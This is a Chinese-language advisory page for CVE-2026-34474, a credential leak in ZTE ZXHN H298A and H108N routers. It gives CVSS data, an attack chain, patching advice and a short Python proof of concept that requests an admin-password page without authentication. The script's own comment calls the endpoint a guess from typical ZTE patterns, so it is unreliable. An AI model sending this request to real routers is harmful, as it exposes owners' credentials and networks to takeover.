CVE-2026-34474 CVSS 7.5 高危

CVE-2026-34474: ZTE路由器敏感信息泄露漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34474

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ZTE ZXHN H298A, ZTE ZXHN H108N

漏洞概述

ZTE ZXHN H298A和H108N路由器存在敏感信息泄露漏洞。攻击者无需认证即可通过精心构造的请求访问Web管理接口，导致管理员密码、WLAN PSK等敏感凭据泄露，从而接管网络。

技术细节

该漏洞主要影响ZTE ZXHN H298A (v1.1) 和 H108N (v2.6) 设备。由于Web管理接口的特定端点缺乏适当的访问控制，攻击者可以通过网络发送特制的HTTP请求。服务器响应中会包含设备配置的明文或编码后的敏感信息，如管理员账户密码和WLAN预共享密钥。攻击无需用户交互，且利用难度低，成功利用后可导致设备被完全控制。

攻击链分析

STEP 1

1. 信息搜集

攻击者扫描网络识别目标ZTE路由器设备及其型号。

STEP 2

2. 发送恶意请求

攻击者向路由器Web接口发送特制的HTTP请求，访问未授权的敏感信息端点。

STEP 3

3. 获取凭据

路由器响应请求，泄露管理员密码和WLAN PSK等敏感数据。

STEP 4

4. 接管设备

攻击者利用获取的凭据登录管理后台，修改配置或进一步攻击内网。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target = "http://192.168.1.1" # Replace with actual target IP

# Vulnerable endpoint example (based on typical ZTE patterns)
endpoint = "/getpage.gch?pid=1002&nextpage=telecom_admin_web_admin_password_t.gch"

try:
    # Send crafted request without authentication
    response = requests.get(target + endpoint, timeout=10)
    
    if response.status_code == 200:
        print("[+] Potential vulnerability detected!")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Server returned status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Connection error: {e}")

影响范围

ZTE ZXHN H298A 1.1

ZTE ZXHN H108N 2.6

防御指南

临时缓解措施

建议立即检查并更新路由器固件。在无法立即更新的情况下，应关闭路由器的远程Web管理功能，仅通过本地连接进行管理，并定期修改高强度密码以减少被攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表